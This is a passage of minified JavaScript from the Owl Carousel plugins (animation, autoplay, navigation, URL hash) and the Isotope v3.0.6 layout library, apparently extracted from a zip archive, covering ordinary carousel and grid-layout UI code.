translated.owl.carousel":a.proxy(function(a){a.namespace&&(this.swapping="translated"==a.type)},this),"translate.owl.carousel":a.proxy(function(a){a.namespace&&this.swapping&&(this.core.options.animateOut||this.core.options.animateIn)&&this.swap()},this)},this.core.$element.on(this.handlers)};e.Defaults={animateOut:!1,
animateIn:!1},e.prototype.swap=function(){if(1===this.core.settings.items&&a.support.animation&&a.support.transition){this.core.speed(0);var b,c=a.proxy(this.clear,this),d=this.core.$stage.children().eq(this.previous),e=this.core.$stage.children().eq(this.next),f=this.core.settings.animateIn,g=this.core.settings.animateOut;this.core.current()!==this.previous&&(g&&(b=this.core.coordinates(this.previous)-this.core.coordinates(this.next),d.one(a.support.animation.end,c).css({left:b+"px"}).addClass("animated owl-animated-out").addClass(g)),f&&e.one(a.support.animation.end,c).addClass("animated owl-animated-in").addClass(f))}},e.prototype.clear=function(b){a(b.target).css({left:""}).removeClass("animated owl-animated-out owl-animated-in").removeClass(this.core.settings.animateIn).removeClass(this.core.settings.animateOut),this.core.onTransitionEnd()},e.prototype.destroy=function(){var a,b;for(a in this.handlers)this.core.$element.off(a,this.handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.Animate=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){var e=function(b){this._core=b,this._call=null,this._time=0,this._timeout=0,this._paused=!0,this._handlers={"changed.owl.carousel":a.proxy(function(a){a.namespace&&"settings"===a.property.name?this._core.settings.autoplay?this.play():this.stop():a.namespace&&"position"===a.property.name&&this._paused&&(this._time=0)},this),"initialized.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.autoplay&&this.play()},this),"play.owl.autoplay":a.proxy(function(a,b,c){a.namespace&&this.play(b,c)},this),"stop.owl.autoplay":a.proxy(function(a){a.namespace&&this.stop()},this),"mouseover.owl.autoplay":a.proxy(function(){this._core.settings.autoplayHoverPause&&this._core.is("rotating")&&this.pause()},this),"mouseleave.owl.autoplay":a.proxy(function(){this._core.settings.autoplayHoverPause&&this._core.is("rotating")&&this.play()},this),"touchstart.owl.core":a.proxy(function(){this._core.settings.autoplayHoverPause&&this._core.is("rotating")&&this.pause()},this),"touchend.owl.core":a.proxy(function(){this._core.settings.autoplayHoverPause&&this.play()},this)},this._core.$element.on(this._handlers),this._core.options=a.extend({},e.Defaults,this._core.options)};e.Defaults={autoplay:!1,autoplayTimeout:5e3,autoplayHoverPause:!1,autoplaySpeed:!1},e.prototype._next=function(d){this._call=b.setTimeout(a.proxy(this._next,this,d),this._timeout*(Math.round(this.read()/this._timeout)+1)-this.read()),this._core.is("interacting")||c.hidden||this._core.next(d||this._core.settings.autoplaySpeed)},e.prototype.read=function(){return(new Date).getTime()-this._time},e.prototype.play=function(c,d){var e;this._core.is("rotating")||this._core.enter("rotating"),c=c||this._core.settings.autoplayTimeout,e=Math.min(this._time%(this._timeout||c),c),this._paused?(this._time=this.read(),this._paused=!1):b.clearTimeout(this._call),this._time+=this.read()%c-e,this._timeout=c,this._call=b.setTimeout(a.proxy(this._next,this,d),c-e)},e.prototype.stop=function(){this._core.is("rotating")&&(this._time=0,this._paused=!0,b.clearTimeout(this._call),this._core.leave("rotating"))},e.prototype.pause=function(){this._core.is("rotating")&&!this._paused&&(this._time=this.read(),this._paused=!0,b.clearTimeout(this._call))},e.prototype.destroy=function(){var a,b;this.stop();for(a in this._handlers)this._core.$element.off(a,this._handlers[a]);for(b in Object.getOwnPropertyNames(this))"function"!=typeof this[b]&&(this[b]=null)},a.fn.owlCarousel.Constructor.Plugins.autoplay=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){"use strict";var e=function(b){this._core=b,this._initialized=!1,this._pages=[],this._controls={},this._templates=[],this.$element=this._core.$element,this._overrides={next:this._core.next,prev:this._core.prev,to:this._core.to},this._handlers={"prepared.owl.carousel":a.proxy(function(b){b.namespace&&this._core.settings.dotsData&&this._templates.push('<div class="'+this._core.settings.dotClass+'">'+a(b.content).find("[data-dot]").addBack("[data-dot]").attr("data-dot")+"</div>")},this),"added.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.dotsData&&this._templates.splice(a.position,0,this._templates.pop())},this),"remove.owl.carousel":a.proxy(function(a){a.namespace&&this._core.settings.dotsData&&this._templates.splice(a.position,1)},this),"changed.owl.carousel":a.proxy(function(a){a.namespace&&"position"==a.property.name&&this.draw()},this),"initialized.owl.carousel":a.proxy(function(a){a.namespace&&!this._initialized&&(this._core.trigger("initialize",null,"navigation"),this.initialize(),this.update(),this.draw(),this._initialized=!0,this._core.trigger("initialized",null,"navigation"))},this),"refreshed.owl.carousel":a.proxy(function(a){a.namespace&&this._initialized&&(this._core.trigger("refresh",null,"navigation"),this.update(),this.draw(),this._core.trigger("refreshed",null,"navigation"))},this)},this._core.options=a.extend({},e.Defaults,this._core.options),this.$element.on(this._handlers)};e.Defaults={nav:!1,navText:['<span aria-label="Previous">&#x2039;</span>','<span aria-label="Next">&#x203a;</span>'],navSpeed:!1,navElement:'button type="button" role="presentation"',navContainer:!1,navContainerClass:"owl-nav",navClass:["owl-prev","owl-next"],slideBy:1,dotClass:"owl-dot",dotsClass:"owl-dots",dots:!0,dotsEach:!1,dotsData:!1,dotsSpeed:!1,dotsContainer:!1},e.prototype.initialize=function(){var b,c=this._core.settings;this._controls.$relative=(c.navContainer?a(c.navContainer):a("<div>").addClass(c.navContainerClass).appendTo(this.$element)).addClass("disabled"),this._controls.$previous=a("<"+c.navElement+">").addClass(c.navClass[0]).html(c.navText[0]).prependTo(this._controls.$relative).on("click",a.proxy(function(a){this.prev(c.navSpeed)},this)),this._controls.$next=a("<"+c.navElement+">").addClass(c.navClass[1]).html(c.navText[1]).appendTo(this._controls.$relative).on("click",a.proxy(function(a){this.next(c.navSpeed)},this)),c.dotsData||(this._templates=[a('<button role="button">').addClass(c.dotClass).append(a("<span>")).prop("outerHTML")]),this._controls.$absolute=(c.dotsContainer?a(c.dotsContainer):a("<div>").addClass(c.dotsClass).appendTo(this.$element)).addClass("disabled"),this._controls.$absolute.on("click","button",a.proxy(function(b){var d=a(b.target).parent().is(this._controls.$absolute)?a(b.target).index():a(b.target).parent().index();b.preventDefault(),this.to(d,c.dotsSpeed)},this));for(b in this._overrides)this._core[b]=a.proxy(this[b],this)},e.prototype.destroy=function(){var a,b,c,d,e;e=this._core.settings;for(a in this._handlers)this.$element.off(a,this._handlers[a]);for(b in this._controls)"$relative"===b&&e.navContainer?this._controls[b].html(""):this._controls[b].remove();for(d in this.overides)this._core[d]=this._overrides[d];for(c in Object.getOwnPropertyNames(this))"function"!=typeof this[c]&&(this[c]=null)},e.prototype.update=function(){var a,b,c,d=this._core.clones().length/2,e=d+this._core.items().length,f=this._core.maximum(!0),g=this._core.settings,h=g.center||g.autoWidth||g.dotsData?1:g.dotsEach||g.items;if("page"!==g.slideBy&&(g.slideBy=Math.min(g.slideBy,g.items)),g.dots||"page"==g.slideBy)for(this._pages=[],a=d,b=0,c=0;a<e;a++){if(b>=h||0===b){if(this._pages.push({start:Math.min(f,a-d),end:a-d+h-1}),Math.min(f,a-d)===f)break;b=0,++c}b+=this._core.mergers(this._core.relative(a))}},e.prototype.draw=function(){var b,c=this._core.settings,d=this._core.items().length<=c.items,e=this._core.relative(this._core.current()),f=c.loop||c.rewind;this._controls.$relative.toggleClass("disabled",!c.nav||d),c.nav&&(this._controls.$previous.toggleClass("disabled",!f&&e<=this._core.minimum(!0)),this._controls.$next.toggleClass("disabled",!f&&e>=this._core.maximum(!0))),this._controls.$absolute.toggleClass("disabled",!c.dots||d),c.dots&&(b=this._pages.length-this._controls.$absolute.children().length,c.dotsData&&0!==b?this._controls.$absolute.html(this._templates.join("")):b>0?this._controls.$absolute.append(new Array(b+1).join(this._templates[0])):b<0&&this._controls.$absolute.children().slice(b).remove(),this._controls.$absolute.find(".active").removeClass("active"),this._controls.$absolute.children().eq(a.inArray(this.current(),this._pages)).addClass("active"))},e.prototype.onTrigger=function(b){var c=this._core.settings;b.page={index:a.inArray(this.current(),this._pages),count:this._pages.length,size:c&&(c.center||c.autoWidth||c.dotsData?1:c.dotsEach||c.items)}},e.prototype.current=function(){var b=this._core.relative(this._core.current());return a.grep(this._pages,a.proxy(function(a,c){return a.start<=b&&a.end>=b},this)).pop()},e.prototype.getPosition=function(b){var c,d,e=this._core.settings;return"page"==e.slideBy?(c=a.inArray(this.current(),this._pages),d=this._pages.length,b?++c:--c,c=this._pages[(c%d+d)%d].start):(c=this._core.relative(this._core.current()),d=this._core.items().length,b?c+=e.slideBy:c-=e.slideBy),c},e.prototype.next=function(b){a.proxy(this._overrides.to,this._core)(this.getPosition(!0),b)},e.prototype.prev=function(b){a.proxy(this._overrides.to,this._core)(this.getPosition(!1),b)},e.prototype.to=function(b,c,d){var e;!d&&this._pages.length?(e=this._pages.length,a.proxy(this._overrides.to,this._core)(this._pages[(b%e+e)%e].start,c)):a.proxy(this._overrides.to,this._core)(b,c)},a.fn.owlCarousel.Constructor.Plugins.Navigation=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){"use strict";var e=function(c){this._core=c,this._hashes={},this.$element=this._core.$element,this._handlers={"initialized.owl.carousel":a.proxy(function(c){c.namespace&&"URLHash"===this._core.settings.startPosition&&a(b).trigger("hashchange.owl.navigation")},this),"prepared.owl.carousel":a.proxy(function(b){if(b.namespace){var c=a(b.content).find("[data-hash]").addBack("[data-hash]").attr("data-hash");if(!c)return;this._hashes[c]=b.content}},this),"changed.owl.carousel":a.proxy(function(c){if(c.namespace&&"position"===c.property.name){var d=this._core.items(this._core.relative(this._core.current())),e=a.map(this._hashes,function(a,b){return a===d?b:null}).join();if(!e||b.location.hash.slice(1)===e)return;b.location.hash=e}},this)},this._core.options=a.extend({},e.Defaults,this._core.options),this.$element.on(this._handlers),a(b).on("hashchange.owl.navigation",a.proxy(function(a){var c=b.location.hash.substring(1),e=this._core.$stage.children(),f=this._hashes[c]&&e.index(this._hashes[c]);f!==d&&f!==this._core.current()&&this._core.to(this._core.relative(f),!1,!0)},this))};e.Defaults={URLhashListener:!1},e.prototype.destroy=function(){var c,d;a(b).off("hashchange.owl.navigation");for(c in this._handlers)this._core.$element.off(c,this._handlers[c]);for(d in Object.getOwnPropertyNames(this))"function"!=typeof this[d]&&(this[d]=null)},a.fn.owlCarousel.Constructor.Plugins.Hash=e}(window.Zepto||window.jQuery,window,document),function(a,b,c,d){function e(b,c){var e=!1,f=b.charAt(0).toUpperCase()+b.slice(1);return a.each((b+" "+h.join(f+" ")+f).split(" "),function(a,b){if(g[b]!==d)return e=!c||b,!1}),e}function f(a){return e(a,!0)}var g=a("<support>").get(0).style,h="Webkit Moz O ms".split(" "),i={transition:{end:{WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd",transition:"transitionend"}},animation:{end:{WebkitAnimation:"webkitAnimationEnd",MozAnimation:"animationend",OAnimation:"oAnimationEnd",animation:"animationend"}}},j={csstransforms:function(){return!!e("transform")},csstransforms3d:function(){return!!e("perspective")},csstransitions:function(){return!!e("transition")},cssanimations:function(){return!!e("animation")}};j.csstransitions()&&(a.support.transition=new String(f("transition")),a.support.transition.end=i.transition.end[a.support.transition]),j.cssanimations()&&(a.support.animation=new String(f("animation")),a.support.animation.end=i.animation.end[a.support.animation]),j.csstransforms()&&(a.support.transform=new String(f("transform")),a.support.transform3d=j.csstransforms3d())}(window.Zepto||window.jQuery,window,document);PK�8FZ*�����js/jquery.isotope.min.jsnu�[���/*!
 * Isotope PACKAGED v3.0.6
 *
 * Licensed GPLv3 for open source use
 * or Isotope Commercial License for commercial use
 *
 * https://isotope.metafizzy.co
 * Copyright 2010-2018 Metafizzy
 */

!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,s,a){function u(t,e,o){var n,s="$()."+i+'("'+e+'")';return t.each(function(t,u){var h=a.data(u,i);if(!h)return void r(i+" not initialized. Cannot call methods, i.e. "+s);var d=h[e];if(!d||"_"==e.charAt(0))return void r(s+" is not a valid method");var l=d.apply(h,o);n=void 0===n?l:n}),void 0!==n?n:t}function h(t,e){t.each(function(t,o){var n=a.data(o,i);n?(n.option(e),n._init()):(n=new s(o,e),a.data(o,i,n))})}a=a||e||t.jQuery,a&&(s.prototype.option||(s.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,t))}),a.fn[i]=function(t){if("string"==typeof t){var e=n.call(arguments,1);return u(this,t,e)}return h(this,t),this},o(a))}function o(t){!t||t&&t.bridget||(t.bridget=i)}var n=Array.prototype.slice,s=t.console,r="undefined"==typeof s?function(){}:function(t){s.error(t)};return o(e||t.jQuery),i}),function(t,e){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",e):"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=typeof window?window:this,function(){function t(){}var e=t.prototype;return e.on=function(t,e){if(t&&e){var i=this._events=this._events||{},o=i[t]=i[t]||[];return o.indexOf(e)==-1&&o.push(e),this}},e.once=function(t,e){if(t&&e){this.on(t,e);var i=this._onceEvents=this._onceEvents||{},o=i[t]=i[t]||{};return o[e]=!0,this}},e.off=function(t,e){var i=this._events&&this._events[t];if(i&&i.length){var o=i.indexOf(e);return o!=-1&&i.splice(o,1),this}},e.emitEvent=function(t,e){var i=this._events&&this._events[t];if(i&&i.length){i=i.slice(0),e=e||[];for(var o=this._onceEvents&&this._onceEvents[t],n=0;n<i.length;n++){var s=i[n],r=o&&o[s];r&&(this.off(t,s),delete o[s]),s.apply(this,e)}return this}},e.allOff=function(){delete this._events,delete this._onceEvents},t}),function(t,e){"function"==typeof define&&define.amd?define("get-size/get-size",e):"object"==typeof module&&module.exports?module.exports=e():t.getSize=e()}(window,function(){"use strict";function t(t){var e=parseFloat(t),i=t.indexOf("%")==-1&&!isNaN(e);return i&&e}function e(){}function i(){for(var t={width:0,height:0,innerWidth:0,innerHeight:0,outerWidth:0,outerHeight:0},e=0;e<h;e++){var i=u[e];t[i]=0}return t}function o(t){var e=getComputedStyle(t);return e||a("Style returned "+e+". Are you running this code in a hidden iframe on Firefox? See https://bit.ly/getsizebug1"),e}function n(){if(!d){d=!0;var e=document.createElement("div");e.style.width="200px",e.style.padding="1px 2px 3px 4px",e.style.borderStyle="solid",e.style.borderWidth="1px 2px 3px 4px",e.style.boxSizing="border-box";var i=document.body||document.documentElement;i.appendChild(e);var n=o(e);r=200==Math.round(t(n.width)),s.isBoxSizeOuter=r,i.removeChild(e)}}function s(e){if(n(),"string"==typeof e&&(e=document.querySelector(e)),e&&"object"==typeof e&&e.nodeType){var s=o(e);if("none"==s.display)return i();var a={};a.width=e.offsetWidth,a.height=e.offsetHeight;for(var d=a.isBorderBox="border-box"==s.boxSizing,l=0;l<h;l++){var f=u[l],c=s[f],m=parseFloat(c);a[f]=isNaN(m)?0:m}var p=a.paddingLeft+a.paddingRight,y=a.paddingTop+a.paddingBottom,g=a.marginLeft+a.marginRight,v=a.marginTop+a.marginBottom,_=a.borderLeftWidth+a.borderRightWidth,z=a.borderTopWidth+a.borderBottomWidth,I=d&&r,x=t(s.width);x!==!1&&(a.width=x+(I?0:p+_));var S=t(s.height);return S!==!1&&(a.height=S+(I?0:y+z)),a.innerWidth=a.width-(p+_),a.innerHeight=a.height-(y+z),a.outerWidth=a.width+g,a.outerHeight=a.height+v,a}}var r,a="undefined"==typeof console?e:function(t){console.error(t)},u=["paddingLeft","paddingRight","paddingTop","paddingBottom","marginLeft","marginRight","marginTop","marginBottom","borderLeftWidth","borderRightWidth","borderTopWidth","borderBottomWidth"],h=u.length,d=!1;return s}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("desandro-matches-selector/matches-selector",e):"object"==typeof module&&module.exports?module.exports=e():t.matchesSelector=e()}(window,function(){"use strict";var t=function(){var t=window.Element.prototype;if(t.matches)return"matches";if(t.matchesSelector)return"matchesSelector";for(var e=["webkit","moz","ms","o"],i=0;i<e.length;i++){var o=e[i],n=o+"MatchesSelector";if(t[n])return n}}();return function(e,i){return e[t](i)}}),function(t,e){"function"==typeof define&&define.amd?define("fizzy-ui-utils/utils",["desandro-matches-selector/matches-selector"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("desandro-matches-selector")):t.fizzyUIUtils=e(t,t.matchesSelector)}(window,function(t,e){var i={};i.extend=function(t,e){for(var i in e)t[i]=e[i];return t},i.modulo=function(t,e){return(t%e+e)%e};var o=Array.prototype.slice;i.makeArray=function(t){if(Array.isArray(t))return t;if(null===t||void 0===t)return[];var e="object"==typeof t&&"number"==typeof t.length;return e?o.call(t):[t]},i.removeFrom=function(t,e){var i=t.indexOf(e);i!=-1&&t.splice(i,1)},i.getParent=function(t,i){for(;t.parentNode&&t!=document.body;)if(t=t.parentNode,e(t,i))return t},i.getQueryElement=function(t){return"string"==typeof t?document.querySelector(t):t},i.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e](t)},i.filterFindElements=function(t,o){t=i.makeArray(t);var n=[];return t.forEach(function(t){if(t instanceof HTMLElement){if(!o)return void n.push(t);e(t,o)&&n.push(t);for(var i=t.querySelectorAll(o),s=0;s<i.length;s++)n.push(i[s])}}),n},i.debounceMethod=function(t,e,i){i=i||100;var o=t.prototype[e],n=e+"Timeout";t.prototype[e]=function(){var t=this[n];clearTimeout(t);var e=arguments,s=this;this[n]=setTimeout(function(){o.apply(s,e),delete s[n]},i)}},i.docReady=function(t){var e=document.readyState;"complete"==e||"interactive"==e?setTimeout(t):document.addEventListener("DOMContentLoaded",t)},i.toDashed=function(t){return t.replace(/(.)([A-Z])/g,function(t,e,i){return e+"-"+i}).toLowerCase()};var n=t.console;return i.htmlInit=function(e,o){i.docReady(function(){var s=i.toDashed(o),r="data-"+s,a=document.querySelectorAll("["+r+"]"),u=document.querySelectorAll(".js-"+s),h=i.makeArray(a).concat(i.makeArray(u)),d=r+"-options",l=t.jQuery;h.forEach(function(t){var i,s=t.getAttribute(r)||t.getAttribute(d);try{i=s&&JSON.parse(s)}catch(a){return void(n&&n.error("Error parsing "+r+" on "+t.className+": "+a))}var u=new e(t,i);l&&l.data(t,o,u)})})},i}),function(t,e){"function"==typeof define&&define.amd?define("outlayer/item",["ev-emitter/ev-emitter","get-size/get-size"],e):"object"==typeof module&&module.exports?module.exports=e(require("ev-emitter"),require("get-size")):(t.Outlayer={},t.Outlayer.Item=e(t.EvEmitter,t.getSize))}(window,function(t,e){"use strict";function i(t){for(var e in t)return!1;return e=null,!0}function o(t,e){t&&(this.element=t,this.layout=e,this.position={x:0,y:0},this._create())}function n(t){return t.replace(/([A-Z])/g,function(t){return"-"+t.toLowerCase()})}var s=document.documentElement.style,r="string"==typeof s.transition?"transition":"WebkitTransition",a="string"==typeof s.transform?"transform":"WebkitTransform",u={WebkitTransition:"webkitTransitionEnd",transition:"transitionend"}[r],h={transform:a,transition:r,transitionDuration:r+"Duration",transitionProperty:r+"Property",transitionDelay:r+"Delay"},d=o.prototype=Object.create(t.prototype);d.constructor=o,d._create=function(){this._transn={ingProperties:{},clean:{},onEnd:{}},this.css({position:"absolute"})},d.handleEvent=function(t){var e="on"+t.type;this[e]&&this[e](t)},d.getSize=function(){this.size=e(this.element)},d.css=function(t){var e=this.element.style;for(var i in t){var o=h[i]||i;e[o]=t[i]}},d.getPosition=function(){var t=getComputedStyle(this.element),e=this.layout._getOption("originLeft"),i=this.layout._getOption("originTop"),o=t[e?"left":"right"],n=t[i?"top":"bottom"],s=parseFloat(o),r=parseFloat(n),a=this.layout.size;o.indexOf("%")!=-1&&(s=s/100*a.width),n.indexOf("%")!=-1&&(r=r/100*a.height),s=isNaN(s)?0:s,r=isNaN(r)?0:r,s-=e?a.paddingLeft:a.paddingRight,r-=i?a.paddingTop:a.paddingBottom,this.position.x=s,this.position.y=r},d.layoutPosition=function(){var t=this.layout.size,e={},i=this.layout._getOption("originLeft"),o=this.layout._getOption("originTop"),n=i?"paddingLeft":"paddingRight",s=i?"left":"right",r=i?"right":"left",a=this.position.x+t[n];e[s]=this.getXValue(a),e[r]="";var u=o?"paddingTop":"paddingBottom",h=o?"top":"bottom",d=o?"bottom":"top",l=this.position.y+t[u];e[h]=this.getYValue(l),e[d]="",this.css(e),this.emitEvent("layout",[this])},d.getXValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&!e?t/this.layout.size.width*100+"%":t+"px"},d.getYValue=function(t){var e=this.layout._getOption("horizontal");return this.layout.options.percentPosition&&e?t/this.layout.size.height*100+"%":t+"px"},d._transitionTo=function(t,e){this.getPosition();var i=this.position.x,o=this.position.y,n=t==this.position.x&&e==this.position.y;if(this.setPosition(t,e),n&&!this.isTransitioning)return void this.layoutPosition();var s=t-i,r=e-o,a={};a.transform=this.getTranslate(s,r),this.transition({to:a,onTransitionEnd:{transform:this.layoutPosition},isCleaning:!0})},d.getTranslate=function(t,e){var i=this.layout._getOption("originLeft"),o=this.layout._getOption("originTop");return t=i?t:-t,e=o?e:-e,"translate3d("+t+"px, "+e+"px, 0)"},d.goTo=function(t,e){this.setPosition(t,e),this.layoutPosition()},d.moveTo=d._transitionTo,d.setPosition=function(t,e){this.position.x=parseFloat(t),this.position.y=parseFloat(e)},d._nonTransition=function(t){this.css(t.to),t.isCleaning&&this._removeStyles(t.to);for(var e in t.onTransitionEnd)t.onTransitionEnd[e].call(this)},d.transition=function(t){if(!parseFloat(this.layout.options.transitionDuration))return void this._nonTransition(t);var e=this._transn;for(var i in t.onTransitionEnd)e.onEnd[i]=t.onTransitionEnd[i];for(i in t.to)e.ingProperties[i]=!0,t.isCleaning&&(e.clean[i]=!0);if(t.from){this.css(t.from);var o=this.element.offsetHeight;o=null}this.enableTransition(t.to),this.css(t.to),this.isTransitioning=!0};var l="opacity,"+n(a);d.enableTransition=function(){if(!this.isTransitioning){var t=this.layout.options.transitionDuration;t="number"==typeof t?t+"ms":t,this.css({transitionProperty:l,transitionDuration:t,transitionDelay:this.staggerDelay||0}),this.element.addEventListener(u,this,!1)}},d.onwebkitTransitionEnd=function(t){this.ontransitionend(t)},d.onotransitionend=function(t){this.ontransitionend(t)};var f={"-webkit-transform":"transform"};d.ontransitionend=function(t){if(t.target===this.element){var e=this._transn,o=f[t.propertyName]||t.propertyName;if(delete e.ingProperties[o],i(e.ingProperties)&&this.disableTransition(),o in e.clean&&(this.element.style[t.propertyName]="",delete e.clean[o]),o in e.onEnd){var n=e.onEnd[o];n.call(this),delete e.onEnd[o]}this.emitEvent("transitionEnd",[this])}},d.disableTransition=function(){this.removeTransitionStyles(),this.element.removeEventListener(u,this,!1),this.isTransitioning=!1},d._removeStyles=function(t){var e={};for(var i in t)e[i]="";this.css(e)};var c={transitionProperty:"",transitionDuration:"",transitionDelay:""};return d.removeTransitionStyles=function(){this.css(c)},d.stagger=function(t){t=isNaN(t)?0:t,this.staggerDelay=t+"ms"},d.removeElem=function(){this.element.parentNode.removeChild(this.element),this.css({display:""}),this.emitEvent("remove",[this])},d.remove=function(){return r&&parseFloat(this.layout.options.transitionDuration)?(this.once("transitionEnd",function(){this.removeElem()}),void this.hide()):void this.removeElem()},d.reveal=function(){delete this.isHidden,this.css({display:""});var t=this.layout.options,e={},i=this.getHideRevealTransitionEndProperty("visibleStyle");e[i]=this.onRevealTransitionEnd,this.transition({from:t.hiddenStyle,to:t.visibleStyle,isCleaning:!0,onTransitionEnd:e})},d.onRevealTransitionEnd=function(){this.isHidden||this.emitEvent("reveal")},d.getHideRevealTransitionEndProperty=function(t){var e=this.layout.options[t];if(e.opacity)return"opacity";for(var i in e)return i},d.hide=function(){this.isHidden=!0,this.css({display:""});var t=this.layout.options,e={},i=this.getHideRevealTransitionEndProperty("hiddenStyle");e[i]=this.onHideTransitionEnd,this.transition({from:t.visibleStyle,to:t.hiddenStyle,isCleaning:!0,onTransitionEnd:e})},d.onHideTransitionEnd=function(){this.isHidden&&(this.css({display:"none"}),this.emitEvent("hide"))},d.destroy=function(){this.css({position:"",left:"",right:"",top:"",bottom:"",transition:"",transform:""})},o}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("outlayer/outlayer",["ev-emitter/ev-emitter","get-size/get-size","fizzy-ui-utils/utils","./item"],function(i,o,n,s){return e(t,i,o,n,s)}):"object"==typeof module&&module.exports?module.exports=e(t,require("ev-emitter"),require("get-size"),require("fizzy-ui-utils"),require("./item")):t.Outlayer=e(t,t.EvEmitter,t.getSize,t.fizzyUIUtils,t.Outlayer.Item)}(window,function(t,e,i,o,n){"use strict";function s(t,e){var i=o.getQueryElement(t);if(!i)return void(u&&u.error("Bad element for "+this.constructor.namespace+": "+(i||t)));this.element=i,h&&(this.$element=h(this.element)),this.options=o.extend({},this.constructor.defaults),this.option(e);var n=++l;this.element.outlayerGUID=n,f[n]=this,this._create();var s=this._getOption("initLayout");s&&this.layout()}function r(t){function e(){t.apply(this,arguments)}return e.prototype=Object.create(t.prototype),e.prototype.constructor=e,e}function a(t){if("number"==typeof t)return t;var e=t.match(/(^\d*\.?\d*)(\w*)/),i=e&&e[1],o=e&&e[2];if(!i.length)return 0;i=parseFloat(i);var n=m[o]||1;return i*n}var u=t.console,h=t.jQuery,d=function(){},l=0,f={};s.namespace="outlayer",s.Item=n,s.defaults={containerStyle:{position:"relative"},initLayout:!0,originLeft:!0,originTop:!0,resize:!0,resizeContainer:!0,transitionDuration:"0.4s",hiddenStyle:{opacity:0,transform:"scale(0.001)"},visibleStyle:{opacity:1,transform:"scale(1)"}};var c=s.prototype;o.extend(c,e.prototype),c.option=function(t){o.extend(this.options,t)},c._getOption=function(t){var e=this.constructor.compatOptions[t];return e&&void 0!==this.options[e]?this.options[e]:this.options[t]},s.compatOptions={initLayout:"isInitLayout",horizontal:"isHorizontal",layoutInstant:"isLayoutInstant",originLeft:"isOriginLeft",originTop:"isOriginTop",resize:"isResizeBound",resizeContainer:"isResizingContainer"},c._create=function(){this.reloadItems(),this.stamps=[],this.stamp(this.options.stamp),o.extend(this.element.style,this.options.containerStyle);var t=this._getOption("resize");t&&this.bindResize()},c.reloadItems=function(){this.items=this._itemize(this.element.children)},c._itemize=function(t){for(var e=this._filterFindItemElements(t),i=this.constructor.Item,o=[],n=0;n<e.length;n++){var s=e[n],r=new i(s,this);o.push(r)}return o},c._filterFindItemElements=function(t){return o.filterFindElements(t,this.options.itemSelector)},c.getItemElements=function(){return this.items.map(function(t){return t.element})},c.layout=function(){this._resetLayout(),this._manageStamps();var t=this._getOption("layoutInstant"),e=void 0!==t?t:!this._isLayoutInited;this.layoutItems(this.items,e),this._isLayoutInited=!0},c._init=c.layout,c._resetLayout=function(){this.getSize()},c.getSize=function(){this.size=i(this.element)},c._getMeasurement=function(t,e){var o,n=this.options[t];n?("string"==typeof n?o=this.element.querySelector(n):n instanceof HTMLElement&&(o=n),this[t]=o?i(o)[e]:n):this[t]=0},c.layoutItems=function(t,e){t=this._getItemsForLayout(t),this._layoutItems(t,e),this._postLayout()},c._getItemsForLayout=function(t){return t.filter(function(t){return!t.isIgnored})},c._layoutItems=function(t,e){if(this._emitCompleteOnItems("layout",t),t&&t.length){var i=[];t.forEach(function(t){var o=this._getItemLayoutPosition(t);o.item=t,o.isInstant=e||t.isLayoutInstant,i.push(o)},this),this._processLayoutQueue(i)}},c._getItemLayoutPosition=function(){return{x:0,y:0}},c._processLayoutQueue=function(t){this.updateStagger(),t.forEach(function(t,e){this._positionItem(t.item,t.x,t.y,t.isInstant,e)},this)},c.updateStagger=function(){var t=this.options.stagger;return null===t||void 0===t?void(this.stagger=0):(this.stagger=a(t),this.stagger)},c._positionItem=function(t,e,i,o,n){o?t.goTo(e,i):(t.stagger(n*this.stagger),t.moveTo(e,i))},c._postLayout=function(){this.resizeContainer()},c.resizeContainer=function(){var t=this._getOption("resizeContainer");if(t){var e=this._getContainerSize();e&&(this._setContainerMeasure(e.width,!0),this._setContainerMeasure(e.height,!1))}},c._getContainerSize=d,c._setContainerMeasure=function(t,e){if(void 0!==t){var i=this.size;i.isBorderBox&&(t+=e?i.paddingLeft+i.paddingRight+i.borderLeftWidth+i.borderRightWidth:i.paddingBottom+i.paddingTop+i.borderTopWidth+i.borderBottomWidth),t=Math.max(t,0),this.element.style[e?"width":"height"]=t+"px"}},c._emitCompleteOnItems=function(t,e){function i(){n.dispatchEvent(t+"Complete",null,[e])}function o(){r++,r==s&&i()}var n=this,s=e.length;if(!e||!s)return void i();var r=0;e.forEach(function(e){e.once(t,o)})},c.dispatchEvent=function(t,e,i){var o=e?[e].concat(i):i;if(this.emitEvent(t,o),h)if(this.$element=this.$element||h(this.element),e){var n=h.Event(e);n.type=t,this.$element.trigger(n,i)}else this.$element.trigger(t,i)},c.ignore=function(t){var e=this.getItem(t);e&&(e.isIgnored=!0)},c.unignore=function(t){var e=this.getItem(t);e&&delete e.isIgnored},c.stamp=function(t){t=this._find(t),t&&(this.stamps=this.stamps.concat(t),t.forEach(this.ignore,this))},c.unstamp=function(t){t=this._find(t),t&&t.forEach(function(t){o.removeFrom(this.stamps,t),this.unignore(t)},this)},c._find=function(t){if(t)return"string"==typeof t&&(t=this.element.querySelectorAll(t)),t=o.makeArray(t)},c._manageStamps=function(){this.stamps&&this.stamps.length&&(this._getBoundingRect(),this.stamps.forEach(this._manageStamp,this))},c._getBoundingRect=function(){var 